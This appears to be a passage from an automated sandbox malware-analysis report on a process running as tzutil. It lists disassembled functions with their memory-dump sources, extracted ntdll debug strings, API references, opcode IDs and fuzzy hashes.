                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 9805bd6cc3901b9f7221feaf082cbaf38355206f675188b6ce4f7dab8e05a72f
                                                              • Instruction ID: 821fbfbe3cad80130c569ab5fa893862168eaab069ef68d5737977f422f0a6ea
                                                              • Opcode Fuzzy Hash: 9805bd6cc3901b9f7221feaf082cbaf38355206f675188b6ce4f7dab8e05a72f
                                                              • Instruction Fuzzy Hash: 89511575A80645AFDB70DF9CC8A097FB7F9EB44204B40D45AEB96C7681E7B4DA00CB60
                                                              Function 02E77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02EB4725
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02EB4742
                                                              • Execute=1, xrefs: 02EB4713
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 02EB4787
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02EB4655
                                                              • ExecuteOptions, xrefs: 02EB46A0
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02EB46FC
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 6c4306ff1c07603933ee75d20192679a2a8ed15bfcb8ebcd8a8f75448a72cd30
                                                              • Instruction ID: fe0652991d69a690f9ca37ed41d77981d463c3cf1df6e45d1ad787a11cc08ee9
                                                              • Opcode Fuzzy Hash: 6c4306ff1c07603933ee75d20192679a2a8ed15bfcb8ebcd8a8f75448a72cd30
                                                              • Instruction Fuzzy Hash: FF511B316C02197AEF11AAE4DC95FEAB3B9EF04308F14A4A9E509AB1C1E7719A45CF50
                                                              Function 02F16940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: ea61e9a238dd718a024d2d1cfabda3a12fcf2fd0259b95b8d79d72eda457687b
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction Fuzzy Hash: 78022871508341AFD309DF18C890A6FB7EAEFC4744F848A2DFA999B254DB31E905CB42
                                                              Function 02E8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 1151ed80f231e10d6edf2eda37e476d28ae7d72ed5faaf588dc01319cac5fe9e
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 9B81B170E852499EDF24AE68C8517FEBBA2AF4531CF18E21DE8DDE7290C7359840CB50
                                                              Function 02EF20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 2b64f90071700d15a344eccc87e36f37fcfd67b59b77513992fb949499b7e3ba
                                                              • Instruction ID: f9ac07d2caa95eddb863f2de80980d5ab7f871a94a2c2954500a56a331c933d7
                                                              • Opcode Fuzzy Hash: 2b64f90071700d15a344eccc87e36f37fcfd67b59b77513992fb949499b7e3ba
                                                              • Instruction Fuzzy Hash: 77215E76A40119ABDB50DE79C844AEFBBE9EF44748F449126EE49E3240E730DA018BA5
                                                              Function 02D53CBE Relevance: 8.8, Strings: 7, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284161154.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2d50000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                              • API String ID: 0-1416458366
                                                              • Opcode ID: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                              • Instruction ID: a918d2656ab4e9316a26014a986e0913c95fe2732e5753425d873f91229cc874
                                                              • Opcode Fuzzy Hash: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                              • Instruction Fuzzy Hash: B731E2B091028CEBCF05CF94D5886DEBBB1FF04389F858559E81A6F250C771865ACB89
                                                              Function 02E6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EB02BD
                                                              • RTL: Re-Waiting, xrefs: 02EB031E
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EB02E7
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 613edf70d37f360dcc50f2a09a47e51aeb7af222924367c695289a0365051a48
                                                              • Instruction ID: 708b31bbcaa8da5e1caa50a7d5a3c771416bf90ae62365e7cd7f3458458ce61e
                                                              • Opcode Fuzzy Hash: 613edf70d37f360dcc50f2a09a47e51aeb7af222924367c695289a0365051a48
                                                              • Instruction Fuzzy Hash: 1EE1F1306887419FD725CF28D888B6BB7E1BF84358F149A5DF5A68B6D1D730E844CB42
                                                              Function 02E7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02EB7B7F
                                                              • RTL: Re-Waiting, xrefs: 02EB7BAC
                                                              • RTL: Resource at %p, xrefs: 02EB7B8E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: 98038fd45c9f058b246509bdba45089c1cdbf06d81a5e9d04bac5086dda5c4b3
                                                              • Instruction ID: 8365677ad7839e73daa24bf4e20d7beb543ecf38d67aae4217e37c9f95bd91ee
                                                              • Opcode Fuzzy Hash: 98038fd45c9f058b246509bdba45089c1cdbf06d81a5e9d04bac5086dda5c4b3
                                                              • Instruction Fuzzy Hash: CA41D1313847028BD728DE258C50B6BB7E6EF88B18F109A1DF95AD7680DB31E5058F91
                                                              Function 02E7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EB728C
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 02EB72C1
                                                              • RTL: Resource at %p, xrefs: 02EB72A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02EB7294
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 2250c1456516ac989dadcb4762f3e9edb56d2b67d70c97b130beadeb394cfbe8
                                                              • Instruction ID: ca01135ba9fca7da47fb1f02765208c8377bc52405a2695547b92b1b51b46909
                                                              • Opcode Fuzzy Hash: 2250c1456516ac989dadcb4762f3e9edb56d2b67d70c97b130beadeb394cfbe8
                                                              • Instruction Fuzzy Hash: 0A411772A802029BD715DE24CC41BA6B7A6FF94718F10A61DFD59D7640E731E842CBD0
                                                              Function 02EF2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 5635d578e5d6364eb48e9dea2727d9b14e040fa27dc040adbee20c2859ab2fa5
                                                              • Instruction ID: f4c0fb08f9dceaba6a287ad6c3ad4ddb34d9a5984bf312cf16f19d8b328f0e07
                                                              • Opcode Fuzzy Hash: 5635d578e5d6364eb48e9dea2727d9b14e040fa27dc040adbee20c2859ab2fa5
                                                              • Instruction Fuzzy Hash: E8318872A415199FDB60DE28CC40BEE77B9EB44714F449596EE49D3140EB30DA448FA0
                                                              Function 02E87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 413b8ed7667c710b45beae68909adc5ec5fa18d82a2f157f52785cdb7c8887b0
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 1B91B879E802199ADB24EE5AC8806BEF7A5AF45358F74E51AE8DDE72C0D7309940CB10
                                                              Function 02E49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: adc0878f0c76e48b5c0863d64fc4866392a1adef1d34fe7db20b348977e07baf
                                                              • Instruction ID: 1b1e6a43b2eecb4507a92a82c41a2a726e9759501e28cec160bbb374165b980f
                                                              • Opcode Fuzzy Hash: adc0878f0c76e48b5c0863d64fc4866392a1adef1d34fe7db20b348977e07baf
                                                              • Instruction Fuzzy Hash: 1E814B71D402699BDB35DB54CC54BEEB7B9AF48754F0091EAEA09B7240D730AE80CFA0